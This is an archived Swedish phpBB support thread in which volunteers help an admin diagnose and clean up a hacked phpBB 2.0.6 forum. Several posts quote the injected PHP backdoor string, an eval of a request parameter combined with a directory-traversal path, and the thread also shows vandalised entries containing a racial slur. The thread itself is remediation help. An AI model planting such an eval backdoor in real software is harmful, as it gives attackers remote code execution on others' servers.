Error: DEBUG MODE LINE 326

Detta är ett arkiv för phpBB2 Support, Diskussion, MODar, Stilar och översättningar. Den tillhandahålls endast för referensändamål.

Moderatorer: Moderatorgrupp, Supportgrupp

Vargas
Ny medlem
Ny medlem
Svar: 0

Error: DEBUG MODE LINE 326

Inlägg av Vargas »

Hej =)

Sitter nu med ett mindre problem med vårt forum... Jag är admin, och har ftp-tillgång, men jag är inte ordinarie forumskötare. Den som är ordinarie är nu i Lumpen, därav har vi ett litet problem.

Jag är van webb-makare, men inte php-skötare, men vårt forum är stort, och många besökare så tiden blir dyrbar.
Därav försöker jag med att lära mig här igenom o ställa frågan hur man nu gör med detta lilla problem:

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 326
File : /home/l/lajvsver/www/forum/includes/functions.php

Jag har läst om detta problem genom att söka via nätet.... det jag nu upplever det som är att templaten är galet fel.
Ni kan testa o surfa till sajten genom http://www.lajvsverige.se/forum
Ni ser att allt är inramat och har en orange ton... vilket är fel... den skall vara mer stilren etc.

Sedan man loggar in så kommer plöstligt texten där ovan... en vit html-sida med kodtexten.
Men ser att man faktum har loggat in. Om man stänger ner webbläsaren och öppnar den på nytt o går in på sajten, så ser man sitt namn är inloggat.
Någon som har en förklaring? Någon som har ett förslag på åtgärd?
Fredrik Vargas Friberg
Vargas
Ny medlem
Ny medlem

Hittade

Inlägg av Vargas »

Hittade en intressant tråd om detta på nätet nu

http://www.phpbb.com/phpBB/viewtopic.ph ... highlight=

men vill gärna ha mer åsikter här ifrån
Fredrik Vargas Friberg
Användarens profilbild
PazZze
Support
Support

Inlägg av PazZze »

om forumet ligger i en katalog som ligger typ så här sida/(mapp/)*~18/forum så borde det inte vara några problem, men jag tor det inte så denna sökväg " /../../../../../../../../../../../../../../../../../../../tmp template" verkar vara helt åt hellvattnet om jag uttrycker mig så...

det där sista tror jag har att göra med kakor eller catch mappen, det har diskuterats förrut på forumet

Edit:

läs och gör:
http://www.phpbb-se.com/forum/viewtopic.php?p=6285#6285

du kan (men bör inte) köra version 2.0.6 av phpbb, så säg till admin att han ska säga till sina överordnade att han ska på bröllop(eller annan festlighet) så får han permision, ni kan sitta och uppdatera phpbb versionen till 2.0.13 (om det inte kommer ut en ny version innan dess :P)
Joel PazZze Martinsson - phpBB Sverige Support
Vargas
Ny medlem
Ny medlem

Mm

Inlägg av Vargas »

Mm vet inte.. får andra förklaringar via den engelska sajten.... det verkar vara ett ganska vanligt problem vårt forum har.

Så det lär finnas en annan förklaring.
antal katataloger den visar "../../../../../../../../../../../../../../../../../../../tmp template" är ju givetvis inte sant.

Men är nu inne o kollar phpadmin, men vill bara pilla med något jag är 100% säker rätt, då vi har en 15000 inlägg som annars blir raderade.
Fredrik Vargas Friberg
Användarens profilbild
Holger
Support - Ledare
Support - Ledare
Svar: 1

Inlägg av Holger »

Eftersom du kör 2.0.6 så kan det ju vara så att någon har varit inne och pillat på sökvägs-inställningen.

Gå till
ACP -> Generell administration -> Konfiguration -> Skriptsökväg
Kolla att allt är rätt där.

Andra frågor:
1) Har du en backup av databasen?
2) Har du en backup av alla phpBB-filerna (PHP och TPL)?

/Holger
Holger Gremminger
Ingen support via PM!
Användarens profilbild
Holger
Support - Ledare
Support - Ledare

Inlägg av Holger »

Gå till phpmyadmin och öppna databasen.
Klicka på tabellen phpbb_themes_name och kolla om där finns följande information:

Kod: Markera allt

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
/Holger

Edit:
Graham@phpBB.com skrev:The issue seen here is almost certainly someone automatically trying to exploit forums - I've certainly seen source code for doing it that you can just compile and run.

It works by exploiting the issue with regards to session jumping/spoofing which was fixed by 2.0.13 to gain access to the ACP and run scripts in there. If you are running 2.0.13 you are not at risk.

Before anyone asks, yes there is a bug in admin_styles - but it's already been fixed in CVS (and will be included in the next release) and can't be exploited unless you can gain admin access via another means anyway.
Holger Gremminger
Ingen support via PM!
Vargas
Ny medlem
Ny medlem

Inlägg av Vargas »

Holger skrev:Gå till phpmyadmin och öppna databasen.
Klicka på tabellen phpbb_themes_name och kolla om där finns följande information:

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
Har verkligen letat efter de namnet men hittar verkligen inte det....vet inte om jag gör fel, men de namnet finns helt enkelt inte för mina ögon, därav min förvirring om jag ev gör fel etc.

;-)

En användare hade tagit bort sina cookies, då kunde personen plötsligt vara inloggad, men när personen började klicka runt, så kom kod-texten.

Hmm
Fredrik Vargas Friberg
Användarens profilbild
Kail
Administratör
Administratör

Inlägg av Kail »

Vem kallar sig för Nigga? Högst rasistiskt användarnamn tycker jag.
Jakob Persson - Grundare av phpBB Sverige - IT-konsult - http://www.jakob-persson.com
The Complete phpBB Template Design Guide (phpBB 2.x): http://archive.jakob-persson.com/articl ... index.html
Användarens profilbild
Holger
Support - Ledare
Support - Ledare

Inlägg av Holger »

Det beror på att personen i fråga hade ställt in themat som nu "saknas"/ändrats. Med raderade cookies vet webbläsaren/servern ännu inte vilket thema som kommer att väljas. Det är först när användaren loggar in som felet uppträder igen.

/H
Holger Gremminger
Ingen support via PM!
Användarens profilbild
Holger
Support - Ledare
Support - Ledare

Inlägg av Holger »

Kail skrev:Vem kallar sig för Nigga? Högst rasistiskt användarnamn tycker jag.
Det är inte användarnamnet.

Detta står i fältet template_name:
aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp
Det är någon som har tänkt ut detta som dåligt skämt. Nu blir det ju en massa träffar på ordet "nigga" i sökmaskinerna.

/Holger
Holger Gremminger
Ingen support via PM!
Vargas
Ny medlem
Ny medlem

Jag

Inlägg av Vargas »

Jag har hittat filen under theme genom att söka som du Holger föreslog, så den använder detta tema
: FI Black fiblack.css men vi använder den inte... man kanske borde kunna radera den helt?
Fredrik Vargas Friberg
Användarens profilbild
Holger
Support - Ledare
Support - Ledare

Inlägg av Holger »

Japp kör för det.
Ha en backup av databasen i bakhanden ...
Holger Gremminger
Ingen support via PM!
Användarens profilbild
Kail
Administratör
Administratör

Inlägg av Kail »

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp
Jag tror ditt forum blivit hackat, en av mina kunders forum har blivit det. Som tur var raderade de inga inlägg.
Jakob Persson - Grundare av phpBB Sverige - IT-konsult - http://www.jakob-persson.com
The Complete phpBB Template Design Guide (phpBB 2.x): http://archive.jakob-persson.com/articl ... index.html
Vargas
Ny medlem
Ny medlem

Jopps

Inlägg av Vargas »

Det var en hackar-tåg som hackade våran sida. Det var troligen denna grupp som gjorde det http://www.illegalteam.com/

Men att lösa problemet:

Gå in i din databas, sql-databasen, och klicka på den databas som har din php-forum. Klicka sedan "Sök".
Skriv i fältet som öppnar sig ordet "nigga" du kommer sedan få upp ett antal filer. Förstör/deleta:

Men då får du problem med vilken style/template som ditt forum skall ladda upp (men det är nödvändigt ont, alltså ingen fara!). Därav fungerar det fortfarande inte förns att du behöver köra två kommandorader i sql.

Följande kommandorader är:
? skrev:

UPDATE phpbb_config SET config_value = '1' WHERE config_name = 'default_style';

UPDATE phpbb_config SET config_value = '1' WHERE config_name = 'override_user_style';
Dessa två rader kör du genom först klicka på den databas du vill köra filerna i. Sedan klickar du på Konfigurera/Laga.
Där i får du en öppen ruta som du klistrar i dessa två kommandorader ovan, klicka sedan på knappen "Kör" och du har nu ställt in ditt forum på att köra över för att sedan tvinga forumet att köra standard-layouten, templaten.

mvh
Fredrik Vargas Friberg
Användarens profilbild
Holger
Support - Ledare
Support - Ledare

Inlägg av Holger »

Dessutom verkar tabellen phpBB_words förändras:
1,'the','teh'
2,'what','wh4t'
3,'and','*beep* YOU NiGGA'